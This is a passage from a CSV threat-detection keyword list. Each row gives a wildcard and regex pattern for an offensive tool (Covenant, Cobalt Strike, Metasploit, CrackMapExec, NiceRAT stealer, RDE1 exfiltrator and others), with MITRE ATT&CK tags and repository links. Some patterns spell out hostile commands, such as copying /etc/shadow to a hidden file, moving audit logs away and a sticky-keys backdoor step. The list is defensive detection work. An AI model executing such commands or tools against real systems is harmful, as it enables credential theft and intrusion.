TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantAPIExtensions.*",".{0,1000}CovenantAPIExtensions\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantBaseMenuItem.*",".{0,1000}CovenantBaseMenuItem\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantService.cs*",".{0,1000}CovenantService\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUser.cs*",".{0,1000}CovenantUser\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUserLogin.*",".{0,1000}CovenantUserLogin\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUserLoginResult.*",".{0,1000}CovenantUserLoginResult\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUserRegister.*",".{0,1000}CovenantUserRegister\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*covid19_koadic.profile*",".{0,1000}covid19_koadic\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*cow-branded-longhorn.txt*",".{0,1000}cow\-branded\-longhorn\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cowpatty -f *.txt -r *.cap -s *",".{0,1000}cowpatty\s\-f\s.{0,1000}\.txt\s\-r\s.{0,1000}\.cap\s\-s\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Cowpatty*",".{0,1000}Cowpatty.{0,1000}","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/joswr1ght/cowpatty","1","1","N/A","N/A","2","167","39","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z" "*cowsay -f dragon 'PEzor!!*",".{0,1000}cowsay\s\-f\sdragon\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*cp ""/media/windows/Windows/System32/cmd.exe"" ""/media/windows/Windows/System32/*",".{0,1000}cp\s\""\/media\/windows\/Windows\/System32\/cmd\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*cp /etc/shadow /tmp/.*",".{0,1000}cp\s\/etc\/shadow\s\/tmp\/\..{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cp /var/log/audit/audit.log .tmp*",".{0,1000}cp\s\/var\/log\/audit\/audit\.log\s\.tmp.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*cp sliver-* /opt/tools/bin*",".{0,1000}cp\ssliver\-.{0,1000}\s\/opt\/tools\/bin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cpp_test_payload.exe*",".{0,1000}cpp_test_payload\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*Cr3dOv3r*",".{0,1000}Cr3dOv3r.{0,1000}","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","10","1935","411","2019-03-28T14:53:38Z","2017-11-13T20:49:57Z" "*cracf2john.py*",".{0,1000}cracf2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crack_databases.rb*",".{0,1000}crack_databases\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*crack_windows.rb*",".{0,1000}crack_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Crack-allDBs.git*",".{0,1000}Crack\-allDBs\.git.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*Crack-allDBs-main*",".{0,1000}Crack\-allDBs\-main.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crack-allDBs-v1.py*",".{0,1000}crack\-allDBs\-v1\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crack-allDBs-v2.py*",".{0,1000}crack\-allDBs\-v2\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*Cracked5pider/KaynLdr*",".{0,1000}Cracked5pider\/KaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*Cracked5pider/KaynStrike*",".{0,1000}Cracked5pider\/KaynStrike.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *",".{0,1000}crackhound\.py\s\-\-verbose\s\-\-password\s.{0,1000}\s\-\-plain\-text\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-file\s.{0,1000}\s\-\-add\-password\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cracklord-master.*",".{0,1000}cracklord\-master\..{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*cracklord-queued*_amd64.deb*",".{0,1000}cracklord\-queued.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*cracklord-resourced*_amd64.deb*",".{0,1000}cracklord\-resourced.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*CrackMapExec*",".{0,1000}CrackMapExec.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec*",".{0,1000}crackmapexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec.exe*",".{0,1000}crackmapexec\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*crackmapexec.spec*",".{0,1000}crackmapexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*crackpkcs12*",".{0,1000}crackpkcs12.{0,1000}","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","2","135","26","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z" "*crackTGS*",".{0,1000}crackTGS.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*Crafting malicious SYN packet*",".{0,1000}Crafting\smalicious\sSYN\spacket.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Crandle_Builder.ps1*",".{0,1000}Crandle_Builder\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Crassus.csproj*",".{0,1000}Crassus\.csproj.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*Crassus.exe*",".{0,1000}Crassus\.exe.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*Crassus.sln*",".{0,1000}Crassus\.sln.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*crate::modules::{rec2mastodon*rec2virustotal}*",".{0,1000}crate\:\:modules\:\:\{rec2mastodon.{0,1000}rec2virustotal\}.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*CravateRouge/autobloody*",".{0,1000}CravateRouge\/autobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*CravateRouge/bloodyAD*",".{0,1000}CravateRouge\/bloodyAD.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*crawlLdrDllList*",".{0,1000}crawlLdrDllList.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","271","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" "*crcreditcards.txt*",".{0,1000}crcreditcards\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*crde dns -*",".{0,1000}crde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde https -*",".{0,1000}crde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde::utils::checker*",".{0,1000}crde\:\:utils\:\:checker.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde_x64.exe dns -f *",".{0,1000}crde_x64\.exe\sdns\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde_x64.exe https -f *",".{0,1000}crde_x64\.exe\shttps\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*CrealPasswords.txt*",".{0,1000}CrealPasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - 